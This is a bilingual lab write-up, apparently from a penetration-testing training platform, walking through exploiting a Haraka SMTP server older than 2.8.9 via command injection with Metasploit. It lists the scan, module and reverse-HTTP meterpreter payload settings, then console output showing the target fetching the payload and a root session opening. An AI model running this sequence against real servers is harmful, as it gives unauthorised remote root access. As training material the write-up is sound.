Exploiting A Vulnerable SMTP Server
Exploiting SMTP
SMTP (Simple Mail Transfer Protocol) is a communication protocol that is used for the transmission of email.
SMTP uses TCP port 25 by default. It can also be configured to run on TCP port 465 and 587.
Haraka is an open source high performance SMTP server developed in Node.js.
The Haraka SMTP server comes with a plugin for processing attachments. Haraka versions prior to V2.8.9 are vulnerable to command injection.
利用易受攻击的 SMTP 服务器
利用SMTP
SMTP(简单邮件传输协议)是一种用于传输电子邮件的通信协议。
SMTP 默认使用 TCP 端口 25。 它还可以配置为在 TCP 端口 465 和 587 上运行。
Haraka 是一个用 Node.js 开发的开源高性能 SMTP 服务器。
Haraka SMTP 服务器带有一个用于处理附件的插件。 V2.8.9 之前的 Haraka 版本易受命令注入攻击。
Demo: Exploiting A Vulnerable SMTP Server(演示:利用易受攻击的 SMTP 服务器)
You need to be cognizant of that you may run across or come across SMTP servers configured to run on the other ports, namely 465 and 587.
1
2
ifconfig
eth1: inet 192.86.51.2
Make sure that the PostgreSQL Database Service and server is started so that we can interact with MSF database.
1
service postgresql start
Start up the MSF console.
1
msfconsole
Create a new workspace.
1
workspace -a haraka
Set up the global variables for the RHOSTS option.
1
setg RHOSTS 192.86.51.3
Set the global variable for the rhost option.
1
setg rhost 192.86.51.3
Perform an Nmap scan on the target server to identify where the SMTP is currently running. And consequently, we also need to verify that the correct version or the vulnerable version of Haraka SMTP is running on the target server.
We’ll do this by running an Nmap scan from within the MSF console. This can be facilitated through the use of the db_nmap command.
-sV: Perform a service detection scan.
-O: Perform an operating system detection scan.
The db_nmap command will save all of the Nmap scan results into the MSF database, which will allow us to analyze the scan results whenever we want to.
1
db_nmap -sV -O 192.86.51.3
1
2
3
search type:exploit name:haraka
use exploit/linux/smtp/haraka
show options
We need to specify a few important options like the server host (SRVHOST) and the server port (SRVPORT) as well as the email to.
We need to specify the test email send address (email_to). And this must be accepted by the server.
The first option that we want to set is the server port (SRVPORT), which we will set to port 9898.
1
set SRVPORT 9898
Set the email_to option.
1
set email_to root@attackdefense.test
Set the payload that we want to executed on the target system once the exploit is run.
And instead of using a staged payload, we are going to be utilizing a non-staged payload.
1
2
set payload linux/x64/meterpreter_reverse_http
show options
And we then need to set the LHOST option, which is going to be our IP.
And the reason we changed the server port (SRVPORT) to 9898 is because this payload will require the port 8080.
Set the LHOST IP address to the ethernet 1 interface IP.
1
2
set LHOST eth1
run
This is a non-staged payload, or a stateless payload.
The kernel version is 5.4.0.
1
meterpreter > sysinfo
Get our current privileges by typing in getuid, and that will enumerate our current permissions on the target system.
We get the user id of 0. we have root access which means that we have the highest privileges available on the Linux target which consequently means we do not need to elevate our privileges or perform privilege escalation.
1
meterpreter > getuid
That is how to exploit an SMTP server. And in this case, we have explored the process of exploiting the Haraka SMTP server.
Vulnerable SMTP Server
Overview
The target server as described below is running a vulnerable SMTP service. Your task is to fingerprint the application using command line tools available on the Kali terminal and then exploit the application using the appropriate Metasploit module. Get a shell on the target!
Instructions:
- This lab is dedicated to you! No other users are on this network :)
- Once you start the lab, you will have access to a root terminal of a Kali instance
- Your Kali has an interface with IP address 192.X.Y.Z. Run “ip addr” to know the values of X and Y.
- The target server should be located at the IP address 192.X.Y.3.
- Do not attack the gateway located at IP address 192.X.Y.1
- postgresql is not running by default so Metasploit may give you an error about this when starting
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-715.pdf
我自己的思路
1
2
3
4
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.58.156.2 netmask 255.255.255.0 broadcast 192.58.156.255
ether 02:42:c0:3a:9c:02 txqueuelen 0 (Ethernet)
Target IP Address: 192.58.156.3
1
2
3
4
5
6
7
8
9
10
root@attackdefense:~# service postgresql start
[ ok ] Starting PostgreSQL 11 database server: main.
root@attackdefense:~# msfconsole -q
msf5 > workspace -a haraka
[*] Added workspace: haraka
[*] Workspace: haraka
msf5 > setg RHOSTS 192.58.156.3
RHOSTS => 192.58.156.3
msf5 > setg rhost 192.58.156.3
rhost => 192.58.156.3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
msf5 > db_nmap -sV -O 192.58.156.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-02-04 12:35 UTC
[*] Nmap: Nmap scan report for target-1 (192.58.156.3)
[*] Nmap: Host is up (0.000025s latency).
[*] Nmap: Not shown: 999 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 25/tcp open smtp Haraka smtpd 2.8.8
[*] Nmap: MAC Address: 02:42:C0:3A:9C:03 (Unknown)
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.70%E=4%D=2/4%OT=25%CT=1%CU=31202%PV=N%DS=1%DC=D%G=Y%M=0242C0%TM
[*] Nmap: OS:=63DE5126%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=108%TI=Z%CI=Z%II=I%
[*] Nmap: OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
[*] Nmap: OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
[*] Nmap: OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
[*] Nmap: OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
[*] Nmap: OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
[*] Nmap: OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
[*] Nmap: OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
[*] Nmap: OS:%T=40%CD=S)
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: victim-1
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.16 seconds
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.58.156.3 25 tcp smtp open Haraka smtpd 2.8.8
Haraka SMTP Command Injection
The Haraka SMTP server comes with a plugin for processing attachments. Versions before 2.8.9 can be vulnerable to command injection
Haraka SMTP 命令注入
Haraka SMTP 服务器带有一个用于处理附件的插件。2.8.9 之前的版本容易受到命令注入攻击
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
msf5 > search type:exploit name:haraka
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 exploit/linux/smtp/haraka 2017-01-26 excellent Yes Haraka SMTP Command Injection
msf5 > use exploit/linux/smtp/haraka
msf5 exploit(linux/smtp/haraka) > show options
Module options (exploit/linux/smtp/haraka):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
email_from foo@example.com yes Address to send from
email_to admin@localhost yes Email to send to, must be accepted by the server
rhost 192.58.156.3 yes Target server
rport 25 yes Target server port
Exploit target:
Id Name
-- ----
0 linux x64
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
msf5 exploit(linux/smtp/haraka) > set SRVPORT 9898
SRVPORT => 9898
msf5 exploit(linux/smtp/haraka) > set email_to root@attackdefense.test
email_to => root@attackdefense.test
msf5 exploit(linux/smtp/haraka) > set payload linux/x64/meterpreter_reverse_http
payload => linux/x64/meterpreter_reverse_http
msf5 exploit(linux/smtp/haraka) > show options
Module options (exploit/linux/smtp/haraka):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 9898 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
email_from foo@example.com yes Address to send from
email_to root@attackdefense.test yes Email to send to, must be accepted by the server
rhost 192.58.156.3 yes Target server
rport 25 yes Target server port
Payload options (linux/x64/meterpreter_reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 linux x64
msf5 exploit(linux/smtp/haraka) > set LHOST eth1
LHOST => 192.58.156.2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf5 exploit(linux/smtp/haraka) > run
[*] Started HTTP reverse handler on http://192.58.156.2:8080
[*] Exploiting...
[*] Using URL: http://0.0.0.0:9898/Bb0IKR
[*] Local IP: http://10.1.0.9:9898/Bb0IKR
[*] Sending mail to target server...[*] Client 192.58.156.3 (Wget/1.17.1 (linux-gnu)) requested /Bb0IKR
[*] Sending payload to 192.58.156.3 (Wget/1.17.1 (linux-gnu))
[*] http://192.58.156.2:8080 handling request from 192.58.156.3; (UUID: 8x0uh6dc) Redirecting stageless connection from /b0mPpDj0kMkezhjMfRBK-QNBNU9ewCJOCf5UEoh5pheMyNja4_0QoWFmpocWIC_S9U
XIRs-xTMwjS-KYEOcUA31HzfkS18tpYiAsd1xgHz4kD_G1eAPTkDfNC with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] http://192.58.156.2:8080 handling request from 192.58.156.3; (UUID: 8x0uh6dc) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (192.58.156.2:8080 -> 192.58.156.3:41222) at 2023-02-04 12:48:55 +0000
[+] Triggered bug in target server (plugin timeout)
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : 192.58.156.3
OS : Ubuntu 16.04 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
Haraka < 2.8.9 - Remote Command Execution
